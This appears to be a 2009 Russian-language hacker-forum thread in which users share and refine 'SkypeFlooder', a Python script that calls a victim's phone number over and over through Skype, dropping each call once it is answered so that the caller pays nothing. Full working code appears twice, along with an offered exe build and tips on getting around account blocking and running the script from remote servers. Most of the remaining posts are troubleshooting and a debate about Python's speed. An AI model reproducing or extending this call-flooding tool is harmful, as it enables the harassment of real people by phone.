PDA

Просмотр полной версии : [ Python ] SkypeFlooder by inlanger. Флудер телефонов от меня.

inlanger
16.04.2009, 17:07
[ Python ] SkypeFlooder

Написал флудер телефонов на Python. Работает через Skype. В exe не компилировал, так как OpenSource. Забираем, тестируем, пишем свои предложения.
Перед запуском обязательно читаем шапку кода и качаем всё что нужно!

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Флудер телефонов. Работает со skype. У вас должен быть положительный баланс на skype аккаунте.
# Для работы необходимы:
# Python: http://downloads.activestate.com/ActivePython/windows/2.6/ActivePython-2.6.1.1-win32-x86.msi
# Skype4Py: http://garr.dl.sourceforge.net/sourceforge/skype4py/Skype4Py-1.0.31.0.win32.exe
# Skype: http://www.skype.com/intl/ru/download/
#
# version 0.2
# created by inlanger

import sys, time, Skype4Py
from Skype4Py import call

num = raw_input("Input tel number, like +1234567890: ")
pause = raw_input("Input pause(sec): ")
while 1==1:
# This variable will get its actual value in OnCall handler
CallStatus = 0

# Here we define a set of call statuses that indicate a call has been either aborted or finished
CallIsFinished = set ([Skype4Py.clsFailed, Skype4Py.clsFinished, Skype4Py.clsMissed, Skype4Py.clsRefused, Skype4Py.clsBusy, Skype4Py.clsCancelled]);

def AttachmentStatusText(status):
return skype.Convert.AttachmentStatusToText(status)

def CallStatusText(status):
return skype.Convert.CallStatusToText(status)

# This handler is fired when status of Call object has changed
def OnCall(call, status):
global CallStatus
CallStatus = status
print 'Call status: ' + CallStatusText(status)
if CallStatusText(status)=='Call in Progress': #Call in progress
call.Finish()
print "Waiting pause..."

# This handler is fired when Skype attatchment status changes
def OnAttach(status):
print 'API attachment status: ' + AttachmentStatusText(status)
if status == Skype4Py.apiAttachAvailable:
skype.Attach()

# Let's see if we were started with a command line parameter..
try:
CmdLine = num
except:
print 'Missing command line parameter'
sys.exit()

# Creating Skype object and assigning event handlers..
skype = Skype4Py.Skype()
skype.OnAttachmentStatus = OnAttach
skype.OnCallStatus = OnCall

# Starting Skype if it's not running already..
if not skype.Client.IsRunning:
print 'Starting Skype..'
skype.Client.Start()

# Attatching to Skype..
print 'Connecting to Skype..'
skype.Attach()
skype.PlaceCall(CmdLine)

# Checking if what we got from command line parameter is present in our contact list
Found = False

# Loop until CallStatus gets one of "call terminated" values in OnCall handler
while not CallStatus in CallIsFinished:
pass

time.sleep(int(pause))

На данный момент программа:

запрашивает номер телефона жертвы
запрашивает паузу между звонками
звонит на номер жертвы и ждёт поднятия трубки
если жертва берёт трубку то программа сбрасывает звонок, ждёт паузу и заново звонит
если жертва жмёт "отбой вызова", то программа заново звонит

Деньги не успевают уйти с аккаунта! Если вдруг деньги успевают сниматься - поставьте больше паузу между звонками.

В следующей версии может быть прикручу GUI и оптимизирую код.
Все мелкие изменения будут тут (http://dumpz.org/7545/) , крупные буду выкладывать в теме.

Для тех, кто не знает что делать с кодом:
Устанавливаем всё, что написано в шапке кода. Создаём текстовый файл и копируем в него код. Сохраняем с расшерением .py и запускаем.

Вариант от login999, без английских коментов, с проверкой входных данных и другими мелкими изменениями: туц (http://forum.antichat.ru/showpost.php?p=1228802&postcount=18)

Для тех, кто не хочет/не может/не умеет пользоваться питоном собрал ЕХЕ файл. В архиве 3 файла - сама программа, библиотеки к ней и файл vcredist_x86.exe, для тех, у кого программа выдаёт ошибку. Ошибка связана с тем, что ХР и более ранние версии виндузов используют старые сишные библиотеки. Качать отсюда (http://inlanger.org.ua/files/SkypeFlooder.rar) . Просьба не выкладывать на обменники!

Yanker
16.04.2009, 17:13
Отлично работает, +1 за такую софтину!!

Zitt
16.04.2009, 17:21
кул... автор молодец....

inlanger
16.04.2009, 18:21
Пишем отзывы, кто уже пользовался... Мне же надо знать в какую сторону его дорабатывать.

inlanger
17.04.2009, 00:10
Читай внимательнее описание и код. Там всё написано как запускать.

Моргaн
17.04.2009, 00:11
чего то собрал всё как на писали нажал и черное окно открылось и закрылось:(

iron-viper
17.04.2009, 00:21
запусти через командную строку если в венде. Пуск - выполнить - cmd а затем туда перетяни скрипт и нажми "ввод" возможно у тебя не так собралось или еще что, но ты не успеваешь ошибку увидеть, пробуй, так точно увидишь если что не так.

Моргaн
17.04.2009, 00:25
запусти через командную строку если в венде. Пуск - выполнить - cmd а затем туда перетяни скрипт и нажми "ввод" возможно у тебя не так собралось или еще что, но ты не успеваешь ошибку увидеть, пробуй, так точно увидишь если что не так.

сделал и ничего не понял :(

Моргaн
17.04.2009, 00:27
Читай внимательнее описание и код. Там всё написано как запускать.

видео сделай чтоб люди знали как делать а то не понятно много чего :cool:

iron-viper
17.04.2009, 00:39
видео думаю лишнее, что ты не понял? расскажи что не ясно?

_Kris_
17.04.2009, 00:43
Для начала модуль скайпа скачай...
И запускать не обязательно, через командную строку...
Эх...хэккеры...
Кстати еще, скрипт кривой...Точнее не кривой, но бля.дь такой сырой...((((Если что могу поправить...
Стучать если что в его асю...

Моргaн
17.04.2009, 00:45
знал бы я его асю:)

_Kris_
17.04.2009, 00:49
https://forum.antichat.ru/member.php?u=47566

iron-viper
17.04.2009, 09:53
=)

inlanger
17.04.2009, 10:35
Кстати еще, скрипт кривой...Точнее не кривой, но бля.дь такой сырой...((((Если что могу поправить...
Я же писал, что в следующих версиях буду работать с кодом. А сейчас выложил первую, нормально работающую версию.

А для тех, у кого не запускается, и они не умеют читать тексты ошибок - ждите следующую версию. Думаю к ней будет и exe файл.

login999
17.04.2009, 10:44
Я же писал, что в следующих версиях буду работать с кодом. А сейчас выложил первую, нормально работающую версию.

А для тех, у кого не запускается, и они не умеют читать тексты ошибок - ждите следующую версию. Думаю к ней будет и exe файл.
А для тех у кого не запускается, а точнее для питона, то добавьте вначале перед комментами

#!/usr/bin/python
# -*- coding: <Название вашей кодировки (для винды обычно cp1251)> -*-

Ленимся, уважаемый inlanger, если пишем комменты на русском, то кодировку нужно указывать...

inlanger
17.04.2009, 11:42
login999, блин, коменты дописывал в процессе написания поста.

login999
17.04.2009, 12:03
Немного переделал. как мне удобнее+ сделал какую-никакую проверку входных значений + русифицировал и снес английские комменты, так как лично мне они затрудняли чтение кода :)

Насчет работоспособности то нет возможности проверить, так как дома буду не раньше понедельника, а на работе скайпа нету :(, да и акков с балансом тоже нету, да и с синтаксисом для меня тут есть непонятки. Буду дома - потыкаю поближе , так как без скайпа это имеет мало смысла :(
Был бы благодарен, если бы в личку подкинули акк с балансом :rolleyes:

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Флудер телефонов. Работает со skype. У вас должен быть положительный баланс на skype аккаунте.
# Для работы необходимы:
# Python: http://downloads.activestate.com/ActivePython/windows/2.6/ActivePython-2.6.1.1-win32-x86.msi
# Skype4Py: http://garr.dl.sourceforge.net/sourceforge/skype4py/Skype4Py-1.0.31.0.win32.exe
# Skype: http://www.skype.com/intl/ru/download/
#
# version 0.2
# created by inlanger

import sys, time, Skype4Py
from Skype4Py import call

skype = Skype4Py.Skype()

def OnCall(call, status):
global CallStatus
CallStatus = status
print u"Статус звонка: " + skype.Convert.CallStatusToText(status)
if CallStatusText(status)=="Call in Progress":
call.Finish()
print u"Ждем-с..."

def OnAttach(status):
print u"API статус присоединенного: " + skype.Convert.AttachmentStatusToText(status)
if status == Skype4Py.apiAttachAvailable:
skype.Attach()

print u"Введите номер телефона, например +1234567890: "
num = raw_input("")
print u"Ведите паузу (в секундах): "
pause = raw_input("")

while True:
CallStatus = 0
CallIsFinished = set ([Skype4Py.clsFailed, Skype4Py.clsFinished, Skype4Py.clsMissed, Skype4Py.clsRefused, Skype4Py.clsBusy, Skype4Py.clsCancelled]);
if num[-1:].isdigit():
if pause.isdigit():
skype.OnAttachmentStatus = OnAttach
skype.OnCallStatus = OnCall
if not skype.Client.IsRunning:
print u"Запускаем Skype.."
skype.Client.Start()
print u"Присоединяемся к Skype.."
skype.Attach()
skype.PlaceCall(num)
Found = False
while not CallStatus in CallIsFinished:
pass
time.sleep(int(pause))
else:
print u"Прекратите ху*нё* страдать! Введите ЦИФЕРНОЕ значение паузы!"
keypressed = raw_input("")
sys.exit()
else:
print u"Может нормальный номер телефона введем ?"
keypressed = raw_input("")
sys.exit()

inlanger
17.04.2009, 12:14
login999, надо будет как-то помечать свои изменения. Например, напротив своей строчки писать @author login999
Чтобы потом собрать одну нормальную версию и не забыть всех авторов )

login999
17.04.2009, 12:21
login999, надо будет как-то помечать свои изменения. Например, напротив своей строчки писать @author login999
Чтобы потом собрать одну нормальную версию и не забыть всех авторов )
Честно говоря, я уже привык к пиратству, так что пох на цоперайты - мать их, все равно опенсорс, тем более что изменений как таковых то и нету - по мелочи чисто, буду дома - углублюсь нормально, главное чтоб линию сделали, ато уже вторые сутки дома без инета :(

inlanger
17.04.2009, 12:22
login999, насчёт комента к репе )
Разве skype умеет звонить сразу на несколько номеров? Или можно запускать несколько скайпов? Зачем многопоточность?

login999
17.04.2009, 12:34
Разве skype умеет звонить сразу на несколько номеров? Или можно запускать несколько скайпов? Зачем многопоточность?
А вот я хер его знает, если честно, умеет ли он сразу звонить нескольким, но вроде умеет (конференции то можно создавать) :)
Но посмотреть то можно, авось чего-то получится :)

Wo|f
17.04.2009, 15:42
гуденг.. работает (:

mad_xakep
17.04.2009, 15:50
может , я пробывал звонил на два номера сам молчу а они между собой ругаются выясняют кто кому звонит

Wo|f
17.04.2009, 16:29
Заметил, что бабло со счета снимают.. первый звонок халявный.. следующий - уже снимают =\

inlanger
17.04.2009, 16:53
У меня не снимает ни копейки. Тестирую активно, прикалываюсь над сотрудниками. Попробуй поставить паузу дольше между звонками. Я тестирую с паузой 5 секунд.

Wo|f
18.04.2009, 11:43
Ставил паузу больше.. один хер.
Скрин звонков... дабы не пездеть (:
http://i036.radikal.ru/0904/d3/d81b871c97eat.jpg (http://radikal.ru/F/i036.radikal.ru/0904/d3/d81b871c97ea.jpg.html)

inlanger
18.04.2009, 11:55
Странно, за два дня теста ни цента не сняло. Может у тебя инет медленный, и скайп не успевает реагировать на начало разговора?

Wo|f
18.04.2009, 12:01
Инет не ахти конечно.. но думаю 256 кило должно хватить.. =\

inlanger
18.04.2009, 12:11
Вот сейчас проверял на своём телефоне. Брал трубку и сразу, и давал немного позвонить и т.д. Ничего не сняло.
http://img2.pict.com/a7/15/c8/5e349d45809ee8b510e20601d4/cHq2G/untitled2.gif

ImmortalWarrior
26.04.2009, 20:47
Люди! Некоторое время пользовался похожим скриптом на vbs (тож сам писал), и у меня возникали следующие проблемы :confused: :
1) через 1-2 часа работы скрипта сам Скайп вылетал с ошибкой: что-то типа "extarnal error bla-bla division by zero" (версия клиента последняя - 4.0.216, вроде); приходилось каждые 2 часа перезапускать процессы; много людей сталкивалось с этим глюком Скайп? может стоить попробовать старую версию 3.8.ххх? :confused:
2) аккаунты Скайп блокировались примерно через полтора дня (в среднем); это что, каждый день покупать новый аккаунт? кто как боролся с их политикой блокировки? :confused:

По поводу многопоточности: да, Скайп поддерживает конференцию, но для флуда это мало что дает, т.к. если одна из целей возьмет трубку, надо сразу же заканчивать звонок, т.е. всю конференцию; плюс в документации четко сказано, что в каждый момент может существовать не более одного звонка. Может кто мучал конференции и нашел какой-то обход? :confused:

Ну, и по теме: уверен, что такого рода скрипты подойдут только для баловства (для новичков, для теста) :) , т.к. их возможности ограничены. Сам долго мучался, потом плюнул и написал нормальную прогу на Delphi...На сайте для разработчиков (http://developer.skype.com) есть вся необходимая документация. ;)

З.Ы. сорри за небольшой оффтоп :)

login999
27.04.2009, 10:25
Люди! Некоторое время пользовался похожим скриптом на vbs (тож сам писал), и у меня возникали следующие проблемы :confused: :
1) через 1-2 часа работы скрипта сам Скайп вылетал с ошибкой: что-то типа "extarnal error bla-bla division by zero" (версия клиента последняя - 4.0.216, вроде); приходилось каждые 2 часа перезапускать процессы; много людей сталкивалось с этим глюком Скайп? может стоить попробовать старую версию 3.8.ххх? :confused:
2) аккаунты Скайп блокировались примерно через полтора дня (в среднем); это что, каждый день покупать новый аккаунт? кто как боролся с их политикой блокировки? :confused:

По поводу многопоточности: да, Скайп поддерживает конференцию, но для флуда это мало что дает, т.к. если одна из целей возьмет трубку, надо сразу же заканчивать звонок, т.е. всю конференцию; плюс в документации четко сказано, что в каждый момент может существовать не более одного звонка. Может кто мучал конференции и нашел какой-то обход? :confused:

Ну, и по теме: уверен, что такого рода скрипты подойдут только для баловства (для новичков, для теста) :) , т.к. их возможности ограничены. Сам долго мучался, потом плюнул и написал нормальную прогу на Delphi...На сайте для разработчиков (http://developer.skype.com) есть вся необходимая документация. ;)

З.Ы. сорри за небольшой оффтоп :)
Скажи мне, а в чем отличие скрипта от проги ?
Ты наверное плохо понимаешь, что представляет из себя питон =\. Если ты опускаешь питон до уровня пхп или вбс, то я даже не знаю как тебе выразить свое возмущение , я тебе только дам ссылочку на одну страничку http://docs.python.org/modindex.html
P.S. Если я напишу гуй к этому скрипту, и сложу его в екзеху, то чем он будет отличаться от твоего кода на делфе ? Херню вы морознули, уважаемый =\

ImmortalWarrior
28.04.2009, 01:49
Да, действительно, я говорил именно о vbs :) По поводу питона - ниче знать не знаю, поэтому дискутировать не могу; возможно, вы правы...
в чем отличие скрипта от проги ?
скрипт выполняется интерпретатором, прога компилится в машинный код; разница в быстродействии, для данной задачи она может быть существенной (у меня на vbs так и было); к примеру,не достаточно быстрое завершение звонка - улетают деньги с баланса;
А по поводу Если я напишу гуй к этому скрипту, и сложу его в екзеху, то чем он будет отличаться от твоего кода на делфе ?
каким именно образом будет "сложение в екзеху": как обычно, архивация с последующей разархивацией скрипта и запуска в интерпретаторе? это ровным счетом ничего не изменит...есть ли настоящие "компиляторы" питона?

Но это так, к слову ... присмотрюсь еще к этому фрукту :)

login999
28.04.2009, 09:26
Да, действительно, я говорил именно о vbs :) По поводу питона - ниче знать не знаю, поэтому дискутировать не могу; возможно, вы правы...

скрипт выполняется интерпретатором, прога компилится в машинный код; разница в быстродействии, для данной задачи она может быть существенной (у меня на vbs так и было); к примеру,не достаточно быстрое завершение звонка - улетают деньги с баланса;
А по поводу
каким именно образом будет "сложение в екзеху": как обычно, архивация с последующей разархивацией скрипта и запуска в интерпретаторе? это ровным счетом ничего не изменит...есть ли настоящие "компиляторы" питона?

Но это так, к слову ... присмотрюсь еще к этому фрукту :)
Да, сложение в экзеху будет происходить именно таким образом, если бы я имел в виду компилляцию, то я так бы и написал, а это просто "сложение" в моем понимании. Насчет компилляции в байт-код, у питона есть такое понятие как .pyc - Python Compilled, конечно же без интерпритатора их не запустишьи по скорости они проигрывают клмпилированному коду, да вот только разница в том. что он не до такой степени медленный, как вы себе вообразили, в качестве примера :

Google App Engine — Google-хостинг, использует Python для серверных приложений
BitTorrent — клиент-сервер для одного из протоколов файлообменных сетей
Portage — система пакетов, используемая Gentoo Linux
Википедия использует Python для написания ботов
Blender — кросплатформенный 3D редактор, Python использован для поддержки скриптов-плагинов
Civilization IV — популярная стратегическая игра.
Eve-online — MMORPG игра, для написания сервера и клиента использован Stackless Python
GIMP — растровый графический редактор, для написания скриптов используется Python
Minions of Mirth — MMORPG игра, Python использован как основной язык для написания логики сервера и клиента.
Maya — High-end редактор трёхмерной графики. Начиная с версии Maya 8.5 Python используется в качестве скриптового языка наравне с MEL (Maya Embedded Language). Кроме того, Maya Python API (интерфейс к C++ Maya API для Python) используется для создания расширений к Maya, а также для пакетной обработки данных.
Vampire: The Masquerade — Bloodlines — ролевая игра с элементами action, разработанная компанией Troika Games на движке Source от Valve Software, Python активно используется для написания сценария уровней.
Компании и организации, интенсивно использующие Python:
Яндекс
Apple использует Python и Twisted для разработки сервера календарей iCal
Google
NASA
Nokia

(c) Wikipedia

inlanger
28.04.2009, 13:57
На днях пытался набросать гуй к этому делу, и понял, что это лишнее. Кому надо, тот и с консольным окошком разберётся, а школьнеги идут лесом!

Algol
28.04.2009, 16:58
что он не до такой степени медленный, как вы себе вообразили, в качестве примера :
[skipped]
(c) Wikipedia

И что мы видим из приведенных примеров? То что питон используется вместо самописных скриптов, от которых не требуется особое быстродействие, и которые не имеют никакого отношения к ресурсоемкой части игрушки, а именно 3d-движку.
Вот если бы сам движок был на питоне - тогда да, можно было бы говорить о быстродействии питона...

qwerra
28.04.2009, 17:01
inlanger
Всё же,как насчёт ехе?
На домашнем железе перл можно поставить,но как быть с дедиком? Нагружать его лишним софтом не очень то...
Ждём)

login999
28.04.2009, 18:05
И что мы видим из приведенных примеров? То что питон используется вместо самописных скриптов, от которых не требуется особое быстродействие, и которые не имеют никакого отношения к ресурсоемкой части игрушки, а именно 3d-движку.
Вот если бы сам движок был на питоне - тогда да, можно было бы говорить о быстродействии питона...
Eve-online — MMORPG игра, для написания сервера и клиента использован Stackless Python
Civilization IV — популярная стратегическая игра.
Скажем так, я не питаю иллюзий на тему его сверхбыстродействия и бла-бла-бла, прочая, прочая, прочая мое возмущение было вызвано тем, что человек написал что питон может быть достаточно медленным для того чтобы оборвать соединение в нужное время. Для меня например яснее ясного что питон медленне С,С++ и прочих компиллируемых языков, но основными его коньками являются скорость разработки и офигенная читабельность кода. На уровне быдлокодинга, которым занимается ~80%(я вхожу в эти 80%) здешних кодеров питона не то что за глаза, а еще больше хватит, да еще и с лишком будет, а его скорости и подавно. А эта тема, между прочим, уже затрагивалась, у вас, уважаемый Алгол, какая-то нездоровая неприязнь к питону, никто же вас не заставляет переходить на него, а о разработке мощных приложений в данном топике не то что речи не было, а и не будет, так как неоткуда им тут взяться

inlanger
28.04.2009, 21:26
Всё же,как насчёт ехе?
то, что есть сейчас можно собрать в ехе за 2 минуты )

qwerra
29.04.2009, 00:16
то, что есть сейчас можно собрать в ехе за 2 минуты )
Хотелось бы доверицца профессионалу :D

login999
29.04.2009, 09:59
Заюзайте портабл версию питона и не выносите мозг разработчику
http://www.portablepython.com/releases/
Я ношу на флешке версию 2.6.1 -работает вроде без косяков, хотя иногда есть проблемы с IDLE, но в принципе они некритичны.
П.С. Я хз точно как это творение будет работать с ней, так как это не ActivePython, а CPython, но насколько я понимаю, то там отличия не настолько существенны чтоб это было заметно.
П.П.С. Для работы конкретного скрипта в папку site-packages нужно добавить модуль Skype4Py, хотя это и шаманизм и танцы с бубном, зато при последующих обновлениях не придется его пересобирать

qwerra
29.04.2009, 14:49
Версия портабле тоже весит немало...
ИМХО конечно)

inlanger
29.04.2009, 15:03
Блин, уговорили. Буду дома - соберу ехе файл из того, что сейчас есть.

qwerra
29.04.2009, 21:10
Блин, уговорили. Буду дома - соберу ехе файл из того, что сейчас есть.

Вот!!!
И типа,как стимул,ну и поощрение,что-ли,позволю себе кинуть тебе в личку скайп-акк на 10 баков :D

AnGeI
02.05.2009, 23:05
Уже собрали? АП!

qwerra
02.05.2009, 23:42
...Ждём,без паники.

inlanger
04.05.2009, 12:06
Венда слетела, а на ниаксах py2exe модуля нет ) Займусь вендой и соберу ехе.

qwerra
04.05.2009, 13:17
Ничё,мы потерпим.Не спеши,всё будет в порядке ;)

inlanger
04.05.2009, 14:26
Смотрим шапку, добавил ЕХЕшник!

inlanger
05.05.2009, 21:34
Хоть кто-то отпишитесь, работает ЕХЕшник или нет?

qwerra
05.05.2009, 22:21
Ну конечно работает,а как же иначе :)
Правда долго не тестил,звонков 15 сделал.
С дедиков же,при использовании исходников,а не ехе,через какое то время cmd чего то виснет(тестил на трёх),хз

slav0nic
05.05.2009, 22:54
если честно - код убогий...

login999
05.05.2009, 23:20
Какими ветрами, не ожидал Вас здесь увидеть

.Varius
06.05.2009, 01:18
...Ждём,без паники.
Я уже успел изменится, а в ехе так и не собрали :)

inlanger
06.05.2009, 12:06
а в ехе так и не собрали
читаем тему внимательнее, давно собрали
зато рабочий ) я ж не на продажу его выставляю

qwerra
06.05.2009, 13:44
зато рабочий ) я ж не на продажу его выставляю
И то верно!

.Varius
06.05.2009, 22:40
Работает, спс)

inlanger
05.06.2009, 12:02
Работает, спс)
А как же ещё )

ZERO-Y
06.06.2009, 03:08
Работает, но почему-то снимает со счета, у кого была такая проблемма, посоветуйте как решить.

Может можно сделать что-бы при первом вызове он сам сбрасывал и заново звонил, а не ждал поднятия трубки?

Спасибо!

inlanger
06.06.2009, 16:08
Работает, но почему-то снимает со счета, у кого была такая проблемма, посоветуйте как решить.
Попробуй обновить скайп, или запустить прогу на лучшем инете.
Может можно сделать что-бы при первом вызове он сам сбрасывал и заново звонил, а не ждал поднятия трубки?
Можно, программа сначала так и работала )

ZERO-Y
06.06.2009, 16:21
Попробуй обновить скайп, или запустить прогу на лучшем инете.
А если нету лучшего инета, можно как-то осуществить на том что есть? например это поможет
что-бы при первом вызове он сам сбрасывал и заново звонил, а не ждал поднятия трубки? ?

.Varius
06.06.2009, 20:39
Паузу побольше ставь!

ZERO-Y
06.06.2009, 20:56
Паузу побольше ставь!
Ставил, всеравно, или ставить больше 20 сек ?..

shellz[21h]
07.06.2009, 02:07
А на линуксе будет работать? не могу пока скачать Skype4Py сайт в оффлайне.

inlanger
07.06.2009, 12:01
А на линуксе будет работать?
Skype4Py для линукса вроде нет (

_nic
07.06.2009, 16:05
Хелп залейте питон на какой то обменник ,а то у меня activestate.com даже не пингуется :(
ЗЫ: а что случится если на указаном номере будет занято?

shellz[21h]
07.06.2009, 22:40
Скачал skype4Py, установил успешно, но не робит.
лог:
eval@fork:~/Downloads/Skype4Py-1.0.31.0$ sudo python setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-i686-2.6
creating build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/skype.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/errors.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/__init__.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/callchannel.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/call.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/settings.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/sms.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/voicemail.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/application.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/conversion.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/profile.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/client.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/filetransfer.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/chat.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/user.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/enums.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/utils.py -> build/lib.linux-i686-2.6/Skype4Py
creating build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/__init__.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/posix.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/posix_x11.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/posix_dbus.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/faked_dbus.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/darwin.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/windows.py -> build/lib.linux-i686-2.6/Skype4Py/API
creating build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/fr.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/pt.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/es.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/da.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/et.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ar.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/__init__.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/el.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/nl.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/lt.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/cs.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ja.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/tr.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/fi.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/pl.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/de.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ro.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/it.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/en.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ru.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/bg.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/sv.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/lv.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/hu.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/x1.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/he.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/cz.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ko.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/no.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/pp.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
running install_lib
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/Skype4Py-1.0.31.0.egg-info
Writing /usr/local/lib/python2.6/dist-packages/Skype4Py-1.0.31.0.egg-info

eval@fork:~/Downloads/Skype4Py-1.0.31.0$ cd ~

eval@fork:~$ python flood.py
File "flood.py", line 2
SyntaxError: Non-ASCII character '\xd0' in file flood.py on line 2, but no encoding declared; see http://www.python.org/peps/pep-0263.html for details
eval@fork:~$
Вчем может быть проблема?

login999
08.06.2009, 09:14
']Скачал skype4Py, установил успешно, но не робит.
лог:
eval@fork:~/Downloads/Skype4Py-1.0.31.0$ sudo python setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-i686-2.6
creating build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/skype.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/errors.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/__init__.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/callchannel.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/call.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/settings.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/sms.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/voicemail.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/application.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/conversion.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/profile.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/client.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/filetransfer.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/chat.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/user.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/enums.py -> build/lib.linux-i686-2.6/Skype4Py
copying Skype4Py/utils.py -> build/lib.linux-i686-2.6/Skype4Py
creating build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/__init__.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/posix.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/posix_x11.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/posix_dbus.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/faked_dbus.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/darwin.py -> build/lib.linux-i686-2.6/Skype4Py/API
copying Skype4Py/API/windows.py -> build/lib.linux-i686-2.6/Skype4Py/API
creating build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/fr.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/pt.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/es.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/da.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/et.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/ar.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/__init__.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/el.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/nl.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/lt.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
copying Skype4Py/Languages/cs.py -> build/lib.linux-i686-2.6/Skype4Py/Languages
